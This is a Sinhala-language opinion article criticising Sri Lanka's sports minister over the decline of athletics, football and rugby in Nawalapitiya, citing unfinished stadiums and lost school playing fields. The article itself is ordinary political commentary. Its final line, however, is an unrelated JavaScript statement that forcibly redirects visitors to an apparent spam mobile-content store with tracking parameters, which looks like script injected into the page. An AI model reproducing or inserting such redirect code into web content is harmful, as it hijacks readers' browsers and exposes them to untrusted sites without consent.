නාවලපිටියේ පදක්කම් සිහිනය

සටහන සහ ඡායා නිමල් බණ්ඩාර හේරත්

සියානු කී‍්‍රඩා උළෙලේදී මලල කී‍්‍රඩා අංශයෙන් ශී‍්‍ර ලංකාව පදක්කම් ලබා නොගැනීම ගැන මලල කී‍්‍රඩා සංගමය වගකිව යුතුයි. මම මලල කී‍්‍රඩා සංගමයට ඉල්ලූ සපත්තු කුට්ටමේ සිට සියලූම දේවල් ලබාදී තිබෙනවා. පිටරට පුහුණුව අවශ්‍ය කිව්ව අයට පිටරට ගිහින් පුහුණු වීමට අවශ්‍ය සියලූම පහසුකම් ලබාදුන්නා. එම නිසාම ජයග‍්‍රහණය ලබා නොගැනීම ගැන මලල කී‍්‍රඩා සංගමය වගකිව යුතුයි මේ කී‍්‍රඩා අමාත්‍යවරයා විද්‍යුත් මාධ්‍ය ප‍්‍රවෘත්ති විකාශන තුළිනුත් ඔක්තෝබර් 13 වැනි දින දෙරණ රූපවාහිනි නාලිකාවේ අංශක 360 වැඩසටහනට සහභාගි වී න`ගන චෝදනාවයි.
කී‍්‍රඩා ඇමතිවරයා පවසනුයේ නාවලපිටිය නගරය දියුණු කළ බවය. එහි අංග සම්පූර්ණ කී‍්‍රඩාංගණයක් හැදූ බවය. එහෙත් කුමක්ද අද නාවලපිටියෙහි කී‍්‍රඩාවේ ප‍්‍රගතිය. කී‍්‍රඩකයන්ට තිබූ එකම කී‍්‍රඩාංගණය වූ ජයතිලක කී‍්‍රඩාංගණය තවමත් සදා අවසන් නැත. එය තවමත් ජාත්‍යන්තර තත්ත්වයට නිමා වී නැත. සාමාන්‍ය කී‍්‍රඩාංගණයක් ලෙස කී‍්‍රඩකයන්ට කී‍්‍රඩා කරන්න අවකාශය ද එහි නැත. හමුදා පාලනයක් යටතේ නිරන්තර අලූත්වැඩියා කිරීම් සිදු වන මෙම කී‍්‍රඩාංගණය නාවලපිටිය කී‍්‍රඩකයන්ට තහනම් කලාපයක් වී ඇත.

මේ කී‍්‍රඩාංගණය ජාත්‍යන්තර තත්ත්වයට ගන්නවා යැයි කියා අවට කී‍්‍රඩාපිටි 50ක් සැදීමේ වැඩ පටන් ගත්ත ද ඒවා සඳහා ලක්ෂයක් මුදල් වැය කළ ද ඒවායේද නිමක් නැත. මේ වනවිට නගරයෙහි පිහිටි නාවලපිටිය මධ්‍යම මහාවිද්‍යාල කී‍්‍රඩාපිටිය තුළ ගුරු ගම්මානයක් සැදීමට නිවාස තැනීම සඳහා අත්තිවාරම් කපා ඇත. ජයතිලක හැරුණු කොට තිබුණ විශාල කී‍්‍රඩා පිටිය වූ ශාන්තමරියා විදුහල් කී‍්‍රඩා පිටියෙහි පාසල් ගොඩනැගිලි ඉදිකළේය. මේ නිසාම කී‍්‍රඩකයන්ගේ කී‍්‍රඩාවලට තිබුණ ඉඩ ප‍්‍රස්ථාව වැසි ගිහින් හමාරය.

අප ඉතා හොඳින් දන්නා කරුණක් නම් පාසල් ජවන හා පිටියේ තරග තුළින් මලල කී‍්‍රඩකයන් බිහිවන බවය. එහෙත් කී‍්‍රඩාපිටියත් නොමැති නිසාම අතීතයේ දින දෙකක් පුරාවට තිබුණ නාවලපිටිය පාසල්වල නිවාසාන්තර ජවන හා පිටියේ තරග සමහර පාසල්වල නොපැවැත්වූ අතර සමහර පාසල් පැය දෙක තුනකින් එම තරග පවත්වා අවසන් කළ බව නාවලපිටිය පාසල් දරුවන්ගේ මාපියන් දන්නා ප‍්‍රසිද්ධ රහසකි. මේ නාවලපිටියෙහි කී‍්‍රඩාවේ දියුණුවයි.

කී‍්‍රඩා ඇමතිවරයාගේ ගම් පියස වන ගල්පායමිතලාව ප‍්‍රදේශයට නුදුරුව පිහිටි සේනාධිකාරී මහාවිද්‍යාලය තුළින් අතීතයේ අන්තර් පාසල් තරග සඳහා මීටර 10,000, 5000, 800 වැනි ඉසව් සඳහා අති දක්ෂ කී‍්‍රඩකයන් බිහි විය. ඔවුන් නාවලපිටිය පාසල් සමග තරග වැද ජය ගැනීම නිසා නගරයේ පාසල්වලින් ඔවුන්ට ඒ යුගයේ තරගවලට පැමිණිවිට තර්ජන එල්ලවිය. කෙසේනමුත් එම පාසලෙන් දක්ෂ කී‍්‍රඩකයන් සමස්ත ලංකා තරග සඳහා ඉදිරිපත් විය. එවැනි පාසලක් තිබෙනවාද කියා කාගේවත් කතාබහට ලක්වන්නේ නැත.

මධ්‍යම කඳුකරයේ පාපන්දු පොර පිටිය බිහිව තිබුණේ නාවලපිටිය කේන්ද්‍ර කරගෙනය. 1960 දශකයේ සිට කී‍්‍රඩා පුහුණු ගුරුවරුන් ලෙස සිටි රාජන්කන්ද සාමි, පියසේන, තුවාන්සාමන් වැනි අයද ඔවුන්ගෙන් පාපන්දු සහ මලල කී‍්‍රඩා පුහුණුව ලබා ති‍්‍රවිධ හමුදාවට පොලිසියට බැඳී සේවය කර විශ‍්‍රාම ගිය බොහෝ අය සිටිති. ඔවුන් අද බාලයන් හඳුන්වන්නේ ආමි සුගතේ, ආමි සුනිල්, ලොකු අමරේ නේවි නාරංගොඩ වැනි නම්වලින්ය. ඔවුන් පවසන ආකාරයට අතීතයේ නාවලපිටියෙහි පාපන්දු කණ්ඩායම් 20ක් පමණ බිහිව තිබුණි. දක්ෂතා දැක්වීම නිසා එවකට හමුදාවෙන් ඔවුන් සේවයට කැඳවාගෙන ගියා. සෑම සති අන්තයකම නාවලපිටිය නගරයෙහි පාපන්දු තරග පැවැත් වුණා. එම තරග බලන්න නගරයේ කඩසාප්පු මාකට් වසාදමා ජනයා පැමිණියා. අද ඒ පාපන්දු කී‍්‍රඩාවට මොකද වුණේ.

අද 2010 වසරේ කී‍්‍රඩා අමාත්‍යවරයාගේ මූලිකත්වයෙන් අප්කන්ටි‍්‍ර ලයන් නමින් කී‍්‍රඩා සමාජයක් පිහිටුවා ජනපති පුත් සතුටු කිරීමට රගර් කී‍්‍රඩාව ආරම්භ කළා. ඊට අවශ්‍ය කී‍්‍රඩකයන් විදේශීය රටවලින්ද මහනුවර කී‍්‍රඩා සමාජය බිඳදමා උදුරාගත් කී‍්‍රඩකයන්ගෙන් ආරම්භ කළා. නගරයේ කී‍්‍රඩාවට ආදරය කරන අය ඉබේම ප‍්‍රතික්ෂේප වුණා. අද රගර් ගැහිල්ල නතර වෙලා. ලයන්ස්ලාගේ පාපන්දු සංගමයට කී‍්‍රඩා කරන්න විදේශීය පාපන්දු කී‍්‍රඩකයන්ද පිට පළාත් කී‍්‍රඩකයන්ද උපයෝගි කර ගත්තා. දැන් මොකද වෙලා තියෙන්නේ නාවලපිටියේ කී‍්‍රඩකයෝ පේ‍්‍රක්ෂකයෝ වෙලා. මෙයින් අපට පෙනී යන්නේ නාවලපිටියේ කී‍්‍රඩාවේ පරිහානියයි. මෙයට වගකිව යුත්තේ පදක්කම් සිහිනයේ ඉන්න ඇමතිවරයා නොවේද?

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;